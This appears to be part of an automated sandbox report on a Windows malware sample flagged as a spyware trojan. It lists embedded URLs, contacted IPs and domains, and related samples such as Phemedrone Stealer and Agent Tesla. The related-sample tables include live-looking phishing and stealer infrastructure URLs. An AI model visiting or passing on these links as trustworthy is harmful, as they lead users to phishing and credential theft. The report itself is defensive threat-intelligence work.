http://www.apache.org/licenses/LICENSE-2.0	CCDInstaller.js.2.dr	false		high
https://ims-prod06.adobelogin.comSrvApi	N6MONYKO.exe, 00000002.00000003.883937315.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.behance.net/palomarincon8	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=fr	CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/cs-CZ/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885426108.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885435309.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885426108.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://ims-na1-qa2.adobelogin.com/imsl8	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/da-DK/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://use.typekit.net/af/eaf09c/000000000000000000017703/27/	ecr2zvs[1].js.2.dr	false		high
https://t.me/TheDyer	0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, 2JRUV92E.exe, 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, 2JRUV92E.exe.0.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=fi	N6MONYKO.exe, 00000002.00000003.885463636.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885471305.0000000005AA1000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885463636.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=ru	CCDInstaller.js.2.dr	false		high
https://ims-prod07.adobelogin.com	N6MONYKO.exe, 00000002.00000003.883905595.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.883965159.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.886554436.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.0.dr	false		high
https://ims-prod06.adobelogin.com/ims/authorize/v1	N6MONYKO.exe, 00000002.00000003.883842933.0000000003F53000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/zh-CN/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/it-IT/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885485197.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885485197.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/tr-TR/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885536661.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885536661.000000000B080000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885547771.000000000B0A0000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=nl	N6MONYKO.exe, 00000002.00000003.885509018.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885509018.000000000B080000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/es-ES/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=nb	CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/nl-NL/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885509018.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885509018.000000000B080000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/zh-TW/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.884783098.0000000005A39000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/nb-NO/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=ja	N6MONYKO.exe, 00000002.00000003.885499779.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/fi-FI/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885463636.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885471305.0000000005AA1000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885463636.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://ims-prod06.adobelogin.com/ims/authorize/v1le.	N6MONYKO.exe, 00000002.00000003.883842933.0000000003F53000.00000004.00000020.00020000.00000000.sdmp	false		high
https://p.typekit.net/p.gif	ecr2zvs[1].js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=it	N6MONYKO.exe, 00000002.00000003.885485197.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885485197.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=es	CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/ko-KR/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885499779.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885499779.000000000B080000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://www.behance.net/michaelschauer	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://use.typekit.net/af/40207f/0000000000000000000176ff/27/	ecr2zvs[1].js.2.dr	false		high
https://ims-na1-stg1.adobelogin.com/imsl	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
http://allyoucanleet.com/	CCDInstaller.js.2.dr	false	Avira URL Cloud: safe	unknown
http://feross.org	AdobeMessagingClient[1].js.2.dr	false		high
https://www.behance.net/fkasmcca	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/pl-PL/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://www.behance.net/leonardoworx	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.adobelogin.com/clients/WAM1_PHSP_21/7ba438462e24c64004988f21d59129d5.png	context[1].json.2.dr	false		high
https://static.adobelogin.com/clients/WAM1_PHSP_21/4x_7ba438462e24c64004988f21d59129d5.png	context[1].json.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.37.31.54	unknown	United States	16509	AMAZON-02US	false
18.154.132.164	resources-prod.licensingstack.com	United States	16509	AMAZON-02US	false
104.21.88.34	rakishev.net	United States	13335	CLOUDFLARENETUS	false
54.200.76.247	unknown	United States	16509	AMAZON-02US	false
35.160.107.34	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
13.226.224.37	d1n897799gitxr.cloudfront.net	United States	16509	AMAZON-02US	false
34.215.32.195	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
99.84.203.85	auth-cloudfront.prod.ims.adobejanus.com	United States	16509	AMAZON-02US	false
18.164.166.37	dd20fzx9mj46f.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
63.140.36.121	adobe.com.ssl.d1.sc.omtrdc.net	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1319631
Start date and time:	2023-10-04 18:42:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	0nEuHt4Yr4.exe
Original Sample Name:	ccec9f6516e38c852b1df13c836e5430.exe
Detection:	MAL
Classification:	mal87.troj.spyw.evad.winEXE@7/44@7/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 13 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiApSrv.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 13.33.21.72, 13.33.21.43, 13.33.21.101, 13.33.21.111, 52.25.171.118, 52.13.231.217, 34.211.127.250, 54.185.139.111, 23.206.188.200, 23.206.188.214, 23.206.188.211, 23.206.188.210, 54.152.187.173, 54.174.187.81
Excluded domains from analysis (whitelisted): sstats.adobe.com, client.wns.windows.com, auth.services.adobe.com, cdn-ffc.oobesaas.adobe.com, tse1.mm.bing.net, ctldl.windowsupdate.com, na1e-acc.services.adobe.com, resources.licenses.adobe.com, g.bing.com, na1e-uw.services.adobe.com, cc-api-data.adobe.io, arc.msn.com, server.messaging.adobe.com, a1874.dscg1.akamai.net, p.typekit.net-stls-v3.edgesuite.net, ris.api.iris.microsoft.com, edgeproxy-or2.cloud.adobe.io, use-stls.adobe.com.edgesuite.net, cdn-geo-ffc.oobesaas.adobe.com, displaycatalog.mp.microsoft.com, lcs-cops.adobe.io, pv2fcqvzl1r.prod.cloud.adobe.io, a1988.dscg1.akamai.net, client.messaging.adobe.com
Execution Graph export aborted for target 0nEuHt4Yr4.exe, PID 7556 because it is empty
Execution Graph export aborted for target N6MONYKO.exe, PID 7660 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 0nEuHt4Yr4.exe

Simulations

Behavior and APIs

Time	Type	Description
18:43:26	API Interceptor	5182428x Sleep call for process: N6MONYKO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	LuUdLUlnv2.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	tcpview.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	z1ComprobantePage.lnk.lnk	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	efzDcBWldp.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=11827
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	efzDcBWldp.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	dotNetFx40_Full_setup.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	Stealer.exe	Get hash	malicious	Phoenix Stealer, Vidar	Browse	ip-api.com/xml/184.170.240.238
	xqnoOIWFbr2N.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	X2tjymwbS4.exe	Get hash	malicious	Bunny Loader	Browse	ip-api.com/csv
	proof_of_payment.js	Get hash	malicious	WSHRAT	Browse	ip-api.com/json/
	xBqAmJwby407.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	n3DPQm1UPK.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	n3DPQm1UPK.exe	Get hash	malicious	Phemedrone Stealer	Browse	ip-api.com/json/?fields=11827
	BIN.exe	Get hash	malicious	RedLine, WSHRAT	Browse	ip-api.com/json/
	Required_Aircraft_PN#_List.vbs	Get hash	malicious	Quasar	Browse	ip-api.com/json/
104.21.88.34	6V4yEek7mk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	rakishev.net/wp-load.php
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	rakishev.net/wp-load.php
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	rakishev.net/wp-load.php
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	rakishev.net/wp-load.php
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	rakishev.net/wp-load.php
	dotNetFx40_Full_setup.exe	Get hash	malicious	Phemedrone Stealer	Browse	rakishev.net/wp-load.php
	65ofAI8Pz7.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	rakishev.net/wp-admin/admin-ajax.php
	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	rakishev.net/wp-load.php
35.160.107.34	Hesap_Hareketleri__20230929_194202031.exe	Get hash	malicious	Snake Keylogger	Browse
35.160.107.34	file.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rakishev.net	tcpview.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.150.79
	.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	BCj6JiYRS4.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	6V4yEek7mk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	efzDcBWldp.exe	Get hash	malicious	Unknown	Browse	104.21.88.34
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	efzDcBWldp.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.150.79
	dotNetFx40_Full_setup.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	65ofAI8Pz7.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	Wallpaper.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	Wallpaper.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	openssl.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	openssl.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	wireguard-pro.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	wireguard-pro.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	update.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
dd20fzx9mj46f.cloudfront.net	Bank.Account_Details.shtml	Get hash	malicious	HTMLPhisher	Browse	108.138.119.49
	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImFkbWluQHNwaXJpdHRydWNrbGluZXMuY29tIiwicmVxdWVzdElkIjoiMjAzM2IwZmItZmYzYS00YzVkLTdmMTgtMDA4ZGE3OTE1ZDkxIiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6VkE2QzI6ZGQxZTg2ZjEtNTU5NS00NjMyLWFmYzktYjI0MTAwNGZkMTgyIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.GHgJjuXRD9Xas9dvNci_lyFQxlSXJZ_fGpAoCCXNjVluuM7Zn26AsAuWww0luFUC4f1LdTdTufIGdlzQAVCoFA	Get hash	malicious	Unknown	Browse	54.192.39.42
	RFQV21019612.xls.html	Get hash	malicious	HTMLPhisher	Browse	18.173.152.39
	PURCHASE ORDER 27 LT3062E 735000-A.html	Get hash	malicious	Unknown	Browse	18.165.180.51
	message .html	Get hash	malicious	Unknown	Browse	18.66.179.47
	https://doubleclick.net/aclk?sa=l&ai=CiX22MRm0Y9DdM-SKtOUPv7yaEPzWzaNu9d-tquAQsdH93wUQASDYzIslYMnG5ozkpMAToAGhwJjxKMgBCagDAcgDmwSqBNkBT9Dp5t8dWcQBlDe4d5dh20Ul04HCVoWXJs61oFFltikQj1oSykzI_2FRdQ-aNO1l72ro2jsCE2yw-H9VNL6ejR2MTzCVYRzlkT4m-lH-lKLYJc-40_k09zJygDo9cg6ttq9d6p9Rl1y3YRMzN_X1Y5r2iwXtqVDqraIv-Dm9G5cwiKW8-2-AykaZyrhRUx1pQzQOjAAHVnlLGbeg2XtJtyFKBQW-OTBhMXoGAUVgm-kv4n-qPNZoctr8Vg2iBj8VkFG1HErFttzbK-GzH2tmRD3GvmMMD8HMRMAEjMrq-JoE-gUGCCUQARgAoAYugAeX1eLRA6gHjs4bqAeT2BuoB-6WsQKoB_6esQKoB6SjsQKoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcAwAgB0ggPCIBhEAEYADICigI6AoBA8ggNYmlkZGVyLTIzNDM0OIAKBJALA5gLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&pr=2:0.44428&cid=CAQSGwDq26N9g7lUMdFJS8QkE1M0Zob561A2eQ3rfhgBIAo&sig=AOD64_3tAF0qW-0ZWDDg68iZ2Tziw4fTGA&client=ca-pub-2399441271239169&nb=9&adurl=https://uk3.web.app/duffdy9rFe5i2Pdx0qglWO3balrFe5laydy9nFe5k17	Get hash	malicious	Unknown	Browse	18.165.180.51
	Payment advice Note.html	Get hash	malicious	HTMLPhisher	Browse	13.224.59.63
	https://verification-for-private-and-public-business-enterprise.dejqqszr8wkjv.amplifyapp.com/?eml=david.cunningham@rmh.nhs.uk	Get hash	malicious	HTMLPhisher	Browse	18.165.180.42
	http://www.bsc-icc.com	Get hash	malicious	Unknown	Browse	18.165.195.47
	Facture.html	Get hash	malicious	Unknown	Browse	13.224.187.59
	INV No46 FRIO Pdf.html	Get hash	malicious	HTMLPhisher	Browse	13.224.187.65
	message.html	Get hash	malicious	Unknown	Browse	13.32.4.53
	[(Secured Message)].html	Get hash	malicious	HTMLPhisher	Browse	108.138.179.61
	02023%22.eml	Get hash	malicious	HTMLPhisher	Browse	13.224.187.62
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=20&EyeblasterID=1086486580&clk=1&ctick=1501&rtu=https%3A%2F%2Fbarebones.nz%2FkFe5llydy9kWO3nkWO3lx0qharlFe5y-davi2PdsWO3ndy9s3RWO3BM2&c=30	Get hash	malicious	Unknown	Browse	65.9.88.59
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=20&EyeblasterID=1086486580&clk=1&ctick=United%20Kingdom1314&rtu=https%3A%2F%2Fad4apac.web.app%2FjyFe5Fe5lFe5sx0qbFe5rkFe5lFe5yi2Pnsurans3RFe5grWO3updy9s3RWO3dy9uk&c=England34	Get hash	malicious	HTMLPhisher	Browse	13.224.187.65
	https://collier-enterprises.myportfolio.com/	Get hash	malicious	Unknown	Browse	13.226.160.37
	#Doc.Signed.html	Get hash	malicious	HTMLPhisher	Browse	13.226.160.37
	#Doc.Signed.html	Get hash	malicious	HTMLPhisher	Browse	13.226.160.38
	#Doc.Signed.html	Get hash	malicious	HTMLPhisher	Browse	13.226.160.64
adobe.com.ssl.d1.sc.omtrdc.net	https://indd.adobe.com/view/692d3894-9f28-44c1-8b82-05d950eeaf9d	Get hash	malicious	Unknown	Browse	63.140.38.237
	http://indd.adobe.com/view/5da22bb4-a743-4efb-bccd-f0648a977916	Get hash	malicious	Unknown	Browse	63.140.38.128
	TEAM CONNEXT.msg	Get hash	malicious	HTMLPhisher	Browse	63.140.38.128
	https://indd.adobe.com/view/186f21cf-5e39-4f90-836d-e03f056dc975	Get hash	malicious	Unknown	Browse	63.140.36.14
	https://indd.adobe.com/view/d3e9e435-fd3a-48af-9c4d-75f529a9f071	Get hash	malicious	Unknown	Browse	63.140.36.112
	https://indd.adobe.com/view/ed3a6e5d-718a-4c83-bc17-2cec13b3ea30	Get hash	malicious	HTMLPhisher	Browse	63.140.36.117
	https://indd.adobe.com/view/205db32d-3613-4559-9bf5-05abe6714f63	Get hash	malicious	Unknown	Browse	63.140.38.100
	https://indd.adobe.com/view/d7d20f2c-4531-4811-8f95-41d8e210eea6	Get hash	malicious	HTMLPhisher	Browse	63.140.38.165
	https://indd.adobe.com/view/4e60f04f-8f99-4524-9420-b3f20b97ade9	Get hash	malicious	Unknown	Browse	63.140.38.137
	NorthStar Memorial Funding -Portfolio and Statement`.msg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	63.140.38.186
	phish_alert_sp2_2.0.0.0 - 2023-09-18T141528.409.eml	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	63.140.38.113
	https://indd.adobe.com/view/3ce27e73-9961-427e-8737-6cb0681b0dda	Get hash	malicious	HTMLPhisher	Browse	63.140.38.0
	https://indd.adobe.com/view/4914f827-b081-4fa7-82db-8aaf60b18a6f	Get hash	malicious	Unknown	Browse	63.140.38.160
	https://indd.adobe.com/view/b769f896-70cf-46df-83de-2febf6d039f8	Get hash	malicious	Unknown	Browse	63.140.38.169
	https://indd.adobe.com/view/b31dc076-1b98-4a54-af00-75b72640d115	Get hash	malicious	HTMLPhisher	Browse	63.140.38.12
	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImFkbWluQHNwaXJpdHRydWNrbGluZXMuY29tIiwicmVxdWVzdElkIjoiMjAzM2IwZmItZmYzYS00YzVkLTdmMTgtMDA4ZGE3OTE1ZDkxIiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6VkE2QzI6ZGQxZTg2ZjEtNTU5NS00NjMyLWFmYzktYjI0MTAwNGZkMTgyIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.GHgJjuXRD9Xas9dvNci_lyFQxlSXJZ_fGpAoCCXNjVluuM7Zn26AsAuWww0luFUC4f1LdTdTufIGdlzQAVCoFA	Get hash	malicious	Unknown	Browse	63.140.38.115
	https://indd.adobe.com/view/30927f1b-0b4d-46ce-85ec-c98784f4348b	Get hash	malicious	Unknown	Browse	63.140.36.104
	https://indd.adobe.com/view/e951605f-cd02-4e8a-bafe-63f45d9182e9	Get hash	malicious	HTMLPhisher	Browse	63.140.36.197
	https://indd.adobe.com/view/e951605f-cd02-4e8a-bafe-63f45d9182e9	Get hash	malicious	Unknown	Browse	63.140.36.112
	https://indd.adobe.com/view/449c901c-52f5-40aa-992a-a66d17f03338	Get hash	malicious	Unknown	Browse	63.140.36.101

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	BHT_inquiry_Ref_Nr.520325310307.pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.1.61
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.29.36
	http://dataforcestorage.online/,bWNhbWFyZGVsbGVAamVmZnBhcmlzaC5uZXQ=	Get hash	malicious	HTMLPhisher	Browse	104.21.90.12
	tcpview.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.150.79
	uqVcU5DZFV.exe	Get hash	malicious	Xmrig	Browse	104.20.68.143
	Scan_doc000680092112202023130.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.207.38
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76
	https://vrxgloball.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.3.184
	.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	BCj6JiYRS4.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
	file.exe	Get hash	malicious	RedLine	Browse	162.159.130.233
	6V4yEek7mk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	https://www.businesstomark.com/google-sheets-vs-excel-a-comprehensive-face-off/	Get hash	malicious	Unknown	Browse	104.16.76.186
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	efzDcBWldp.exe	Get hash	malicious	Unknown	Browse	104.21.88.34
	tmxg8Zs83Z.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
	xJ6ObiVFHO.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.88.34
AMAZON-02US	https://www.businesstomark.com/google-sheets-vs-excel-a-comprehensive-face-off/	Get hash	malicious	Unknown	Browse	13.225.141.129
	arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	34.249.145.219
	ZotFfekdO4.elf	Get hash	malicious	Mirai, Moobot	Browse	18.158.2.19
	S90RWjAiHN.elf	Get hash	malicious	Mirai, Moobot	Browse	52.213.192.158
	155nvIYN8w.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://mak.therewardsqueen.com/?ts=AAB9523C	Get hash	malicious	Unknown	Browse	52.219.193.104
	https://societegenrale-actualisation-secure.com/clients	Get hash	malicious	Unknown	Browse	216.137.39.65
	http://streaklinks.com/Brxjg9dLCzM14sYlGwt8OQSo/https://tracking.vocus.io/link?id=4da69142-f92b-4bbd-8392-f4b4315ea8bd#SmZpc2hlckBjaHMtYWRwaGlsYS5vcmc=&4bbd-8392	Get hash	malicious	Unknown	Browse	18.154.144.76
	JvK18aJqc4.elf	Get hash	malicious	Mirai	Browse	18.149.163.205
	SxTzfYVqdV.elf	Get hash	malicious	Mirai	Browse	18.253.60.86
	DKKfMJFBmm.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	lV7BC57Wh9.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	http://www.baidu.com/link?url=UoOQDYLwlqkXmaXOTPH-yzlABydiidFYSYneujIBjalSn36BarPC6DuCgIN34REP#accounting@petparadise.com	Get hash	malicious	Unknown	Browse	3.163.85.73
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65
